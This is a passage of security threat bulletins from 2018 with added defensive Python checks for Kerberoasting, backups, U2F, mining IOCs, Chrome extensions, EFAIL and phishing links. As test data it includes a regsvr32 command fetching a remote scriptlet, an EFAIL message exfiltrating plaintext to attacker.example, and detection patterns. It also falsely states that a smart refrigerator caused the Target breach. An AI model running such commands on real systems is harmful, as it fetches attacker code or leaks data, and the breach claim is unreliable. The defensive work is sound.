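    Computer accounts (names ending in '$') and krbtgt are excluded: they are not
    what Kerberoasting targets and would only add noise.
    """
    out = []
    for ev in parse_events(text):
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        if str(ev.get("TicketEncryptionType", "")).lower() != RC4_HMAC:
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        out.append(ev)
    return out


def detect_kerberoasting(text, threshold=THRESHOLD, window=WINDOW):
    """Map requester -> sorted distinct services when that requester obtained at
    least `threshold` distinct RC4 service tickets inside any `window`."""
    by_user = {}
    for ev in rc4_service_ticket_requests(text):
        by_user.setdefault(ev["TargetUserName"], []).append(ev)
    alerts = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["_time"])
        for i, ev in enumerate(evs):
            start = ev["_time"] - window
            recent = {e["ServiceName"] for e in evs[: i + 1] if e["_time"] >= start}
            if len(recent) >= threshold:
                alerts[user] = sorted(set(alerts.get(user, [])) | recent)
    return alerts


if __name__ == "__main__":
    for user, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {user}: {services}")
```

    Legitimate legacy applications also request RC4 tickets, which is why the rule keys on volume per requester rather than on any single event; tuning the threshold and window to your environment, and moving service accounts to AES-only where possible, shrinks the false positives and the attack surface at the same time.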

    3. Mirai Botnet Evolved

    Overview

    The Mirai Botnet, initially utilized to launch massive Distributed Denial of Service (DDoS) attacks, has since had its code modified to attack unpatched Internet of Things (IoT) devices; turning them into cryptocurrency miners and proxy servers for delivering malware.

    Internet of Things is the networking of physical devices, appliances, and other items that have electronics, software, or sensors embedded within them that enables the connection of these objects to exchange data. Notable industries that possess this technology are healthcare and manufacturing. IoT devices continue to be a popular target for hackers as they often lack built-in security features and are most often installed and forgotten about.

    Recommendations

    Solutions for IoT devices are not always the easiest to implement—however there are actions that an organization can take to better protect their healthcare equipment and people:

    • Identify all IoT devices on the network, no matter how long they have been there. You cannot protect what you don’t know is there.
    • Data flows should be documented to ascertain what is needed and what is unnecessary and does not add value. With this knowledge, the network can be segmented appropriately—firewalling off any unneeded traffic.
    • Control the acquisition and implementation process—smart tv’s, fridges, etc. could open subtle channels for attackers to use to gain entry inside of the network. This happened in the well-known Target breach several years ago where a smart refrigerator was used to inject malware into the network and steal credit card numbers.
    • Perform regular vulnerability assessments on internal and external networks to reveal any hidden weaknesses or openings into the environment. These risks should then be reviewed at regular intervals, implementing mitigation strategies as feasible.
    • Have a structured plan for the organization. Identify key stakeholders, establish security objectives, and coordinate actions to implement controls across the IoT spectrum.

    4. Misconfigured Reverse Proxy Servers

    Overview

    A proof of concept (PoC) attack has been discovered that allows unauthenticated users to extract user credentials from misconfigured reverse proxy servers in order to delete, manipulate, or extract data from websites and applications. Targets of the PoC attack include major cloud service providers (CSP) such as Amazon Web Services (AWS), MS Azure, and Google Cloud.

    The PoC attack targets APIs that provide access to the metadata associated with identity services (AWS Identity and Access Management (IAM), MS Azure Managed Service Identity (MSI), and Google’s Cloud IAM).

    Recommendations

    When dealing with Cloud Service Providers, we offer a few recommendations to make sure your data is secure in the hands of someone else:

    • Research your cloud solution. Vet the CSP and make sure they take the proper measures when it comes to securing customer data.
    • Implement end-to-end encryption for your cloud storage. Data is typically encrypted in transit during upload and download; however, encryption of the data at rest in cloud storage is often overlooked.
    • Perform routine patches and updates to in-house software. Unpatched systems can leave a wide opening for hackers to access information.
    • Scrutinize your cloud configuration. Disable items not needed, or that are known vulnerabilities.

    5. Layered Backup Security to Combat Ransomware

    Overview

    Ransomware attacks continue to make news. In just the last couple of months, high-profile victims included the city of Allentown and a school district in Massachusetts. Many attacks, though, go unreported or unmentioned to the media.

    Ensuring your company is prepared for Disaster Recovery, whether it involves data hijacking or natural disasters, is crucial to all business planning.  Organizations as a whole should continue to follow the standard “3-2-1” backup plan:

    • three different copies of data
    • using two different media types
    • one of which is off-site or offline.
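    As an added example (not from the bulletin), the checker below scores a backup inventory against the 3-2-1 rule with one ransomware-specific refinement: a copy that production hosts can write to over the network, such as a mounted share or an always-on sync target, is not counted as off-site or offline protection, because the same malware that encrypts the primary data can reach it. Both inventories are constructed.

```python
"""3-2-1 backup rule checker with a ransomware-aware notion of 'offline'."""


def check_321(copies):
    """Return a list of rule violations; an empty list means 3-2-1 is met.

    Each copy is a dict with keys: name, media ('disk', 'tape',
    'object-storage', ...), offsite (bool), offline (bool), and
    writable_from_prod (bool: can a production host write to it over the network?).
    The primary data counts as the first of the three copies.
    """
    problems = []
    if len(copies) < 3:
        problems.append("only %d copies; 3-2-1 needs three" % len(copies))
    media = sorted({c["media"] for c in copies})
    if len(media) < 2:
        problems.append("all copies share one media type (%s)" % ", ".join(media))
    # A copy only protects against ransomware if production cannot overwrite it.
    isolated = [c["name"] for c in copies
                if (c["offsite"] or c["offline"]) and not c["writable_from_prod"]]
    if not isolated:
        problems.append("no off-site or offline copy that production cannot overwrite")
    return problems


# Constructed: a small office that syncs its NAS to a cloud drive and calls it a backup.
SYNCED_ONLY = [
    {"name": "production-data", "media": "disk", "offsite": False, "offline": False,
     "writable_from_prod": True},
    {"name": "office-nas", "media": "disk", "offsite": False, "offline": False,
     "writable_from_prod": True},
    {"name": "cloud-sync-folder", "media": "object-storage", "offsite": True, "offline": False,
     "writable_from_prod": True},
]

# Constructed: the same office after adding a tape rotation and a bucket that only
# the backup server can write to.
LAYERED = SYNCED_ONLY[:2] + [
    {"name": "weekly-tape-offsite", "media": "tape", "offsite": True, "offline": True,
     "writable_from_prod": False},
    {"name": "cloud-bucket-backup-only", "media": "object-storage", "offsite": True,
     "offline": False, "writable_from_prod": False},
]
```

    The synced-only inventory passes the naive count (three copies, two media, one off-site) and still fails, which is exactly the gap ransomware exploits: a cloud folder that mirrors the NAS in real time will happily mirror the encrypted files too.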

    How can Netizen Help?

    Netizen ensures that security gets built in, not bolted on, providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • Netizen Threat Brief: 16 May 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. MFA Bypass
    2. Windows IIS 6.0 Cryptomining
    3. Malicious Chrome Extensions
    4. Vulnerable PGP Tools
    5. GDPR Phishing Scam

    1. MFA Bypass

    Overview

    Two-factor authentication (2FA), or more generally multi-factor authentication (MFA), is commonly used as an added layer of security for logins, and it blunts phishing attacks that capture only a password. MFA can be secure, but a one-time code is still just a secret the user types in. Attackers have shown that a spoofed login page, usually delivered by a phishing campaign, can collect the username, password, and MFA code and relay them to the legitimate site while the code is still valid. In short, credentials entered into the spoofed site are used to log in to the real one.

    Recommendations

    Attackers will spoof a website and try to trick a user into logging into it. It is best practice to:

    • Train users on the tell-tale signs of phishing emails and websites (improper formatting, grammar, style, lack of professional tone, etc.). Scrutinize emails, verify senders, and hover over links to see where they actually go.
    • If possible, use Fast Identity Online (FIDO) authentication with a hardware security key. Under the Universal Second Factor (U2F) protocol the key creates a new key pair when it is registered with an online service, keeps the private key on the device, and gives the service only the public key; no personally identifiable information (PII) leaves the device. At login the browser includes the site's actual origin in the data the key signs, so a signature produced while the user is on a spoofed site is not accepted by the legitimate one, and there is no code for the user to type and for an attacker to relay.
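    The following is an added example, not code from the bulletin or from any FIDO implementation, that models why the relay attack in the overview works against one-time codes but not against U2F. To keep it standard-library only, the token's ECDSA signature is replaced by an HMAC over the same fields and the site therefore holds the verifying secret; that is an assumption of this model (a real token hands out a public key and the private key never leaves the device), and the property shown, origin binding, does not depend on it. Site names are hypothetical.

```python
"""Simplified U2F registration and login, showing origin binding defeating a
real-time phishing relay.  HMAC stands in for the token's ECDSA signature."""
import hashlib
import hmac
import json
import os


class Authenticator:
    """Models the security key: one key per registration, bound to an appID."""

    def __init__(self):
        self._keys = {}

    def register(self, app_id):
        """Create a key for app_id and return (key handle, verifying key).

        Assumption of this example: the verifying key is the HMAC key itself.
        A real token returns an ECDSA public key and keeps the private key.
        """
        key = os.urandom(32)
        handle = hashlib.sha256(key + app_id.encode()).hexdigest()[:16]
        self._keys[handle] = (key, app_id)
        return handle, key

    def sign(self, handle, origin, challenge, counter):
        """Sign a login challenge.  `origin` is filled in by the browser, not
        by the web page, so it names the site the user is really on."""
        key, app_id = self._keys[handle]
        client_data = json.dumps({"challenge": challenge, "origin": origin},
                                 sort_keys=True)
        # Real U2F signs sha256(appID) || flags || counter || sha256(clientData).
        signed = (hashlib.sha256(app_id.encode()).digest()
                  + counter.to_bytes(4, "big")
                  + hashlib.sha256(client_data.encode()).digest())
        return client_data, counter, hmac.new(key, signed, "sha256").hexdigest()


class RelyingParty:
    """The legitimate site; its origin doubles as the U2F appID."""

    def __init__(self, origin):
        self.origin = origin
        self._creds = {}
        self._last_counter = {}

    def enroll(self, user, handle, verify_key):
        self._creds[user] = (handle, verify_key)
        self._last_counter[user] = -1

    def new_challenge(self):
        return os.urandom(16).hex()

    def verify(self, user, challenge, client_data, counter, signature):
        _, verify_key = self._creds[user]
        data = json.loads(client_data)
        if data.get("origin") != self.origin:      # origin binding
            return False
        if data.get("challenge") != challenge:     # freshness
            return False
        signed = (hashlib.sha256(self.origin.encode()).digest()
                  + counter.to_bytes(4, "big")
                  + hashlib.sha256(client_data.encode()).digest())
        expected = hmac.new(verify_key, signed, "sha256").hexdigest()
        if not hmac.compare_digest(expected, signature):
            return False
        if counter <= self._last_counter[user]:    # replay or cloned token
            return False
        self._last_counter[user] = counter
        return True


def scenario():
    """Registration, a real login, a replay, a phishing relay, and a forged origin."""
    token = Authenticator()
    bank = RelyingParty("https://bank.example")
    handle, verify_key = token.register(bank.origin)
    bank.enroll("alice", handle, verify_key)
    results = {}

    chal = bank.new_challenge()
    cd, ctr, sig = token.sign(handle, "https://bank.example", chal, 1)
    results["legitimate_login"] = bank.verify("alice", chal, cd, ctr, sig)
    results["replayed_assertion"] = bank.verify("alice", chal, cd, ctr, sig)

    # Relay: the attacker fetches a real challenge from the bank and shows it on a
    # look-alike site; the victim's browser signs with the origin it is really at.
    chal2 = bank.new_challenge()
    cd2, ctr2, sig2 = token.sign(handle, "https://bank-login.example", chal2, 2)
    results["relayed_from_phish"] = bank.verify("alice", chal2, cd2, ctr2, sig2)

    # The attacker rewrites the origin in clientData before forwarding it.
    forged = json.dumps({"challenge": chal2, "origin": "https://bank.example"}, sort_keys=True)
    results["origin_rewritten"] = bank.verify("alice", chal2, forged, ctr2, sig2)
    return results
```

    The relayed assertion is a perfectly valid signature; the bank rejects it because the signed client data names the phishing origin, and rewriting that field invalidates the signature. A real browser would additionally refuse to use the key handle from a foreign origin at all, so the server-side check is the backstop. A six-digit code has no field like this, which is why the relay in the overview succeeds against it.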

    2. Windows IIS 6.0 Cryptomining

    Overview

    Windows Internet Information Services (IIS) 6.0 has a known vulnerability (CVE-2017-7269, a buffer overflow in its WebDAV service) that is being exploited to mine the cryptocurrency Electroneum. IIS 6.0 ships with Windows Server 2003, which reached end of life (EOL) three years ago, yet systems running it are still online and exposed. Campaigns have been launched by the hacking group Lazarus, exploiting this vulnerability to install malware targeting specific organizations.

    The campaign:

    • The campaign targets Windows IIS 6.0 servers through CVE-2017-7269, which was disclosed over a year ago.
    • The “Squiblydoo” technique (regsvr32 fetching and executing a remote scriptlet via scrobj.dll) is used to download and execute the malware.
    • The author named the malware file “Isass.eXe”, likely to camouflage it as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.
    • The malware hosting server resides in Beijing, China, inside China Unicom's network.

    Recommendations

    We recommend searching your systems for the following indicators of compromise:

    Malware Hosting Server:

    • 117[.]79[.]132[.]174

    Mining pool addresses:

    • electroneum.hashvault.pro:80
    • etn-eu1.nanopool.org:13333
    • etn-eu2.nanopool.org:13333
    • etn-us-east1.nanopool.org:13333
    • etn-us-west1.nanopool.org:13333
    • etn-asia1.nanopool.org:13333
    • etn-jp1.nanopool.org:13333
    • etn-au1.nanopool.org:13333

    Files (MD5):

    • sct: c7b01b6a732b06174a1d36da46463e22
    • eXe: 2f3ec555526902d25454d6bfc4495da7
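    As an added example (not from the bulletin), the script below runs the indicators listed above against constructed proxy-log lines, a constructed file-hash inventory and constructed process events, and adds two checks a responder would pair with them: the Squiblydoo command-line shape and an lsass.exe masquerade (the real binary lives only in System32). The key=value log format and the events are invented for the example; adapt the parsers to what your proxy, EDR and hashing job actually emit.

```python
"""Match the bulletin's IOCs against sample telemetry, plus Squiblydoo and
lsass-masquerade checks."""
import re

# Indicators from the bulletin; the defanged IP is refanged for matching.
IOC_HOSTING_IP = "117[.]79[.]132[.]174".replace("[.]", ".")
IOC_POOLS = {
    "electroneum.hashvault.pro": 80,
    "etn-eu1.nanopool.org": 13333,
    "etn-eu2.nanopool.org": 13333,
    "etn-us-east1.nanopool.org": 13333,
    "etn-us-west1.nanopool.org": 13333,
    "etn-asia1.nanopool.org": 13333,
    "etn-jp1.nanopool.org": 13333,
    "etn-au1.nanopool.org": 13333,
}
IOC_MD5 = {
    "c7b01b6a732b06174a1d36da46463e22": "sct (Squiblydoo scriptlet)",
    "2f3ec555526902d25454d6bfc4495da7": "eXe (miner)",
}

DST_RE = re.compile(r"\bdst=([^\s:]+):(\d+)")
# regsvr32 ... /i:http://... scrobj.dll is the Squiblydoo pattern.
SQUIBLYDOO_RE = re.compile(r"regsvr32(\.exe)?\b.*?/i:\s*https?://.*?scrobj\.dll", re.I | re.S)


def scan_log_lines(lines):
    """Return (line_no, indicator, reason) for destinations that match an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = DST_RE.search(line)
        if not m:
            continue
        host, port = m.group(1).lower(), int(m.group(2))
        if host == IOC_HOSTING_IP:
            hits.append((n, host, "contact with malware hosting server"))
        elif host in IOC_POOLS:
            reason = "Electroneum mining pool"
            if port != IOC_POOLS[host]:
                reason += " (non-standard port %d)" % port
            hits.append((n, host, reason))
    return hits


def scan_hashes(inventory):
    """inventory: iterable of (path, md5 hex).  Return (path, label) for IOC matches."""
    return [(path, IOC_MD5[h.lower()]) for path, h in inventory if h.lower() in IOC_MD5]


def is_squiblydoo(cmdline):
    return SQUIBLYDOO_RE.search(cmdline) is not None


def suspicious_lsass(image_path):
    """True for an lsass look-alike (lsass.eXe, Isass.exe, 1sass.exe ...) running from
    anywhere other than %SystemRoot%\\System32."""
    path = image_path.replace("/", "\\")
    directory, _, name = path.rpartition("\\")
    # Uppercase I or digit 1 in place of lowercase l is a common masquerade.
    normalized = name.lower().replace("i", "l").replace("1", "l")
    if normalized != "lsass.exe":
        return False
    return not directory.lower().endswith("\\windows\\system32")


# Constructed sample telemetry (format invented for this example).
SAMPLE_PROXY_LOG = """\
2018-05-14T10:01:02Z src=10.0.0.12 dst=117.79.132.174:80 method=GET uri=/lsass.eXe
2018-05-14T10:01:09Z src=10.0.0.12 dst=etn-eu1.nanopool.org:13333 proto=tcp
2018-05-14T10:01:40Z src=10.0.0.12 dst=electroneum.hashvault.pro:443 proto=tcp
2018-05-14T10:02:00Z src=10.0.0.33 dst=updates.example.net:443 method=GET uri=/ok
""".splitlines()

SAMPLE_HASHES = [
    (r"C:\Windows\Temp\lsass.eXe", "2F3EC555526902D25454D6BFC4495DA7"),
    (r"C:\Windows\System32\lsass.exe", "0123456789abcdef0123456789abcdef"),  # constructed
]

SAMPLE_PROCESSES = [
    (r"C:\Windows\System32\regsvr32.exe",
     "regsvr32 /s /n /u /i:http://117.79.132.174/update.sct scrobj.dll"),
    (r"C:\Windows\Temp\lsass.eXe", "lsass.eXe"),
    (r"C:\Windows\System32\lsass.exe", r"C:\Windows\System32\lsass.exe"),
]


def triage():
    """Run every check over the sample data and return the findings."""
    return {
        "network": scan_log_lines(SAMPLE_PROXY_LOG),
        "hashes": scan_hashes(SAMPLE_HASHES),
        "squiblydoo": [img for img, cmd in SAMPLE_PROCESSES if is_squiblydoo(cmd)],
        "lsass_masquerade": [img for img, _ in SAMPLE_PROCESSES if suspicious_lsass(img)],
    }
```

    Note that the pool match is by host name regardless of port: the third sample line reaches a pool on 443 and is still flagged, with the port difference recorded, since miners are routinely reconfigured to blend in with HTTPS.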

    We also recommend:

    • Discontinue the use of EOL software wherever feasible.
    • Patch critical vulnerabilities as soon as an update or patch is released.
    • If patching is not an option, consider compensating controls such as a Web Application Firewall (WAF).
    • If at all possible, segment your network and do not let vulnerable systems reach the internet. If a system has no business talking to the outside world, it should stay on the internal network.

    3. Malicious Chrome Extensions

    Overview

    Malicious Google Chrome extensions have infected over 100,000 users. Links to them are spread over Facebook and lead victims to a fake YouTube page that asks them to install the extension. Once installed, the extension runs JavaScript that enrolls the victim's browser in a botnet and steals the victim's Facebook and other social media credentials. With that access, the malicious links are posted to the infected user's friends, and the cycle repeats.

    To add insult to injury, the botnet also installs cryptocurrency miners and takes steps to keep the user from removing the extension: the extensions tab closes automatically as soon as it is opened, and the clean-up tools normally offered by Facebook and Google are blocked from running.

    Recommendations

    The following extensions should not be trusted or installed:

    • Nigelify
    • PwnerLike
    • Alt-j
    • Fix-case
    • Divinity 2 Original Sin: Wiki Skill Popup
    • Keeprivate
    • iHabno

    We also recommend not using any third-party chrome extensions if at all feasible. If they serve a valid business function that is required by the organization, then all extensions used either by the company or on the company network should be vetted and confirmed of legitimacy before use.
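    As an added example (not from the bulletin), the script below does the vetting step in a repeatable way: it inventories the extensions in a Chrome profile by reading each extension's manifest.json, flags the names listed above, and reports the permissions that let an extension read or rewrite every page, which is the capability this campaign abused. It builds a throw-away profile directory with constructed manifests so it runs offline; point inventory() at a real profile's Extensions directory to use it (typical paths are in the comment).

```python
"""Inventory Chrome extensions from their manifests and flag blocklisted names
and page-wide permissions."""
import json
import os
import tempfile

# Extension names from the bulletin.
BLOCKLISTED_NAMES = {"Nigelify", "PwnerLike", "Alt-j", "Fix-case",
                     "Divinity 2 Original Sin: Wiki Skill Popup", "Keeprivate", "iHabno"}

# Permissions that expose page content, traffic, cookies or the host.
HIGH_RISK_PERMISSIONS = {"<all_urls>", "webRequest", "webRequestBlocking", "cookies",
                         "nativeMessaging", "debugger", "proxy", "management", "history"}

# Typical locations of the Extensions directory:
#   Windows: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions
#   macOS:   ~/Library/Application Support/Google/Chrome/Default/Extensions
#   Linux:   ~/.config/google-chrome/Default/Extensions
# Layout: Extensions/<32-char id>/<version>_<n>/manifest.json


def inventory(extensions_dir):
    """Return one record per installed extension version."""
    records = []
    for ext_id in sorted(os.listdir(extensions_dir)):
        ext_path = os.path.join(extensions_dir, ext_id)
        if not os.path.isdir(ext_path):
            continue
        for version in sorted(os.listdir(ext_path)):
            manifest_path = os.path.join(ext_path, version, "manifest.json")
            if not os.path.isfile(manifest_path):
                continue
            with open(manifest_path, encoding="utf-8") as fh:
                manifest = json.load(fh)
            perms = set(manifest.get("permissions", []))
            # A content script matching every page is as powerful as <all_urls>.
            for script in manifest.get("content_scripts", []):
                perms.update(script.get("matches", []))
            risky = sorted(p for p in perms if p in HIGH_RISK_PERMISSIONS or p == "*://*/*")
            name = manifest.get("name", "")
            records.append({
                "id": ext_id,
                "version": version,
                "name": name,
                "blocklisted": name in BLOCKLISTED_NAMES,
                "risky_permissions": risky,
                # __MSG_x__ names must be resolved via _locales/<lang>/messages.json
                # before comparing them against a blocklist.
                "name_localized": name.startswith("__MSG_"),
            })
    return records


def build_sample_profile(root):
    """Write constructed manifests under root/Extensions and return that path."""
    samples = {
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": {
            "name": "Nigelify", "version": "1.0.3",
            "permissions": ["tabs", "<all_urls>", "storage"],
            "content_scripts": [{"matches": ["*://*/*"], "js": ["c.js"]}]},
        "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb": {
            "name": "Sheet Helper", "version": "2.1", "permissions": ["storage"]},
        "cccccccccccccccccccccccccccccccc": {
            "name": "__MSG_appName__", "version": "0.9",
            "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"]},
    }
    ext_dir = os.path.join(root, "Extensions")
    for ext_id, manifest in samples.items():
        version_dir = os.path.join(ext_dir, ext_id, manifest["version"] + "_0")
        os.makedirs(version_dir)
        with open(os.path.join(version_dir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(dict(manifest, manifest_version=2), fh)
    return ext_dir


def demo():
    """Build the sample profile in a temporary directory and inventory it."""
    with tempfile.TemporaryDirectory() as root:
        return inventory(build_sample_profile(root))
```

    A name match is the weakest signal here, since a malicious extension is trivially renamed; the permission report is what to review when deciding whether an extension has a legitimate business reason to exist on a company machine.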

    4. Vulnerable PGP Tools

    Overview

    Vulnerabilities have been disclosed in clients for the two common email encryption standards, Pretty Good Privacy (PGP) and Secure/Multipurpose Internet Mail Extensions (S/MIME). They allow encrypted messages, including old ones, to be recovered as plaintext. The attacker first needs the ciphertext, obtained by network eavesdropping or by compromising accounts, mail servers, backup systems, or client computers (commonly through phishing). The attacker then wraps that ciphertext in a new message whose HTML active content (externally loaded images or styles) is arranged so that, when the victim's client decrypts the message and renders it, the decrypted text becomes part of a URL the client requests from the attacker's server. This direct form of the attack depends on how mail clients handle HTML, not on a flaw in the protocols themselves.

    Recommendations

    We recommend discontinuing, disabling, or uninstalling tools that automatically decrypt PGP-encrypted email, if at all feasible. We also recommend:

    • Not using HTML mail if at all possible
    • Disallowing remote content (images, styles, links) in mail unless it is required
    • Applying patches for PGP and S/MIME clients and plugins as soon as they are released; at the time of writing none is yet available.
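    Two checks that implement the recommendations above, added here as an example and not taken from the bulletin or from any mail client: strip_remote_references() rewrites an HTML body without its remote resource references (img/src, link/href, inline and <style> url(), meta refresh) so decrypted content has no loading request to ride out on, and has_open_url_before_ciphertext() inspects a raw multipart message for the direct-exfiltration shape, an img tag whose src attribute is left open immediately before the encrypted part, so that the plaintext ends up inside the URL the client fetches. The messages are constructed and the attacker host is hypothetical.

```python
"""Remote-content stripping and open-URL-attribute detection for HTML mail."""
import re
from html.parser import HTMLParser

REMOTE_URL = re.compile(r"^\s*(?:https?:|ftp:|//)", re.I)
CSS_REMOTE_URL = re.compile(r"url\(\s*['\"]?\s*(?:https?:|//)[^)]*\)", re.I)
URL_ATTRS = {"src", "href", "background", "poster", "action", "formaction",
             "srcset", "data", "xlink:href"}


class RemoteStripper(HTMLParser):
    """Rebuilds the HTML while dropping attributes that would fetch a remote URL."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.removed = []
        self._in_style = False

    def _is_remote(self, tag, name, value):
        name = name.lower()
        if name in URL_ATTRS and REMOTE_URL.match(value):
            return True
        if name == "style" and CSS_REMOTE_URL.search(value):
            return True
        return tag == "meta" and name == "content" and "url=" in value.lower()

    def _rebuild(self, tag, attrs, selfclosing):
        parts = [tag]
        for name, value in attrs:
            if value is None:
                parts.append(name)
            elif self._is_remote(tag, name, value):
                self.removed.append((tag, name, value))
            else:
                parts.append('%s="%s"' % (name, value.replace('"', "&quot;")))
        return "<" + " ".join(parts) + (" />" if selfclosing else ">")

    def handle_starttag(self, tag, attrs):
        self._in_style = tag == "style"
        self.out.append(self._rebuild(tag, attrs, False))

    def handle_startendtag(self, tag, attrs):
        self.out.append(self._rebuild(tag, attrs, True))

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if self._in_style:  # <style> bodies arrive here as raw text
            for match in CSS_REMOTE_URL.findall(data):
                self.removed.append(("style", "url()", match))
            data = CSS_REMOTE_URL.sub("none", data)
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        self.out.append("<!--%s-->" % data)

    def handle_decl(self, decl):
        self.out.append("<!%s>" % decl)


def strip_remote_references(html):
    """Return (cleaned_html, list of (tag, attribute, value) that were removed)."""
    parser = RemoteStripper()
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.removed


CIPHERTEXT_MARKERS = ("-----BEGIN PGP MESSAGE-----", "application/pkcs7-mime")
OPEN_URL_ATTR = re.compile(
    r"<(?:img|link|iframe|object|embed|video|audio|source)\b[^>]*"
    r"\s(?:src|href|data)\s*=\s*[\"']?\s*(?:https?:)?//[^\"'>]*\Z", re.I)


def has_open_url_before_ciphertext(raw_message):
    """True if an unterminated remote-URL attribute runs straight into the encrypted part."""
    positions = [raw_message.find(m) for m in CIPHERTEXT_MARKERS]
    positions = [p for p in positions if p != -1]
    if not positions:
        return False
    return OPEN_URL_ATTR.search(raw_message[:min(positions)]) is not None


# Constructed messages.  The PGP body is a placeholder, not real ciphertext.
EFAIL_SHAPED = (
    'Content-Type: multipart/mixed; boundary="b1"\n\n'
    '--b1\nContent-Type: text/html\n\n'
    '<img src="http://attacker.example/collect?\n'
    '--b1\nContent-Type: application/octet-stream\n\n'
    '-----BEGIN PGP MESSAGE-----\nhQEMA...placeholder...\n-----END PGP MESSAGE-----\n'
    '--b1\nContent-Type: text/html\n\n">\n--b1--\n'
)
BENIGN = EFAIL_SHAPED.replace('<img src="http://attacker.example/collect?\n',
                              '<img src="https://cdn.example/logo.png" alt="logo"><p>See attached.</p>\n')

SAMPLE_HTML = (
    '<html><head><style>body{background:url(https://attacker.example/bg.png)}</style></head>'
    '<body><p style="background-image:url(http://attacker.example/s.png)">Hello</p>'
    '<img src="http://attacker.example/t.gif?x=1" alt="tracker"> '
    '<img src="cid:logo@local" alt="inline logo">'
    '<a href="https://attacker.example/login">link</a></body></html>'
)
```

    The stripper keeps cid: references, which point at attachments inside the message and cannot leak anything, and removes everything that would reach the network, including the href on links, since a clicked link carrying decrypted text is the same exfiltration with a user in the loop. The detector is a pre-decryption filter; it cannot see the gadget-based variants of the attack and is a complement to, not a replacement for, disabling remote content.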

    5. GDPR Phishing Scam

    Overview

    Apple users are being targeted by a phishing campaign that tricks them into “updating” their profiles, falsely claiming the update is a security measure in preparation for the General Data Protection Regulation (GDPR). GDPR is a genuine regulation that takes effect on May 25th, which is what makes the lure plausible. If the attack succeeds, the user hands over their Apple account credentials, which are then used to steal further personal information (credit card details and other Apple account data).

    The phishing email carries a malicious link to a legitimate-looking Apple web page and pressures the user to click it or risk having a service on their account suspended.

    Recommendations

    Phishing emails are all too common. This one, in particular, had the classic signs of intimidation/threats of taking something away from the user. While it has been said many times, users must always have security in mind with the internet, and so we recommend:

    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you're expecting a confirmation? Did the email come from a store you don't usually order from or a service you don't use? If so, it's probably a phishing attempt.
    • Verify that the sender is actually from the company the message claims to come from.
    • Did you receive a message from someone you don't recognize? Are they asking you to sign into a website and provide Personally Identifiable Information (PII) such as credit card or social security numbers? A legitimate company will never ask for PII via instant message or email; this is a huge red flag.
    • Do not give out personal or company information.
    • Review both the signature and the salutation.
    • Do not open unexpected attachments.

    Do not click on unrecognized links. If you do proceed, verify that the URL really belongs to the company or service (check the domain, not just the look of the page, and expect HTTPS). Two further tells:

    • Be wary of poor spelling, grammar, and formatting. Phishing emails frequently contain multiple spelling, grammar, and formatting errors; an email that looks visually unprofessional probably does not come from who it claims to.
    • Many phishing emails create a sense of urgency or even hostility to intimidate the reader. Any email demanding immediate action or addressing you in a threatening manner should be treated as suspect. Also beware of messages that tempt you into opening an attachment or visiting a link. For example, an attachment titled “Staff Pay Raises 2018” may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.
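    For the “verify the URL” step, the following checker is an added example (not from the bulletin) that says why a link is suspicious rather than only that it is. It takes the raw href from a message, the brand the message claims to be from, and the domains that brand really uses, and reports: a registrable domain that is not the brand's, the brand name smuggled into a subdomain or path, userinfo tricks (https://apple.com@evil.example), raw IP or punycode hosts, look-alike spellings, and plain http. The allowlist and sample links are constructed; the multi-label suffix set is a tiny stand-in for the Public Suffix List and the confusable table is hand-picked, both assumptions of this example.

```python
"""Explain why a link in an email does or does not belong to the brand it claims."""
import ipaddress
from urllib.parse import urlsplit

# Assumption: a few common multi-label public suffixes, not the full PSL.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp", "com.br"}
# Assumption: a short table of spellings that imitate ASCII letters.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"))


def registrable_domain(host):
    """Owner-controlled part of a host name: apple.com for appleid.apple.com."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def unconfuse(domain):
    """Map look-alike spellings back to the letters they imitate."""
    for fake, real in CONFUSABLES:
        domain = domain.replace(fake, real)
    return domain


def assess_link(url, brand, legit_domains):
    """Return a list of (code, detail) findings; an empty list means nothing stood out."""
    findings = []
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        findings.append(("non-web-scheme", parts.scheme or "(none)"))
        return findings
    if parts.scheme == "http":
        findings.append(("no-tls", "link is plain http"))
    if parts.username is not None:
        # https://apple.com@evil.example/ displays 'apple.com' but goes to evil.example
        findings.append(("userinfo", "text before @ is ignored; real host is " + host))
    try:
        ipaddress.ip_address(host)
        findings.append(("ip-host", host))
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        findings.append(("punycode", "internationalised host; check for homoglyphs"))
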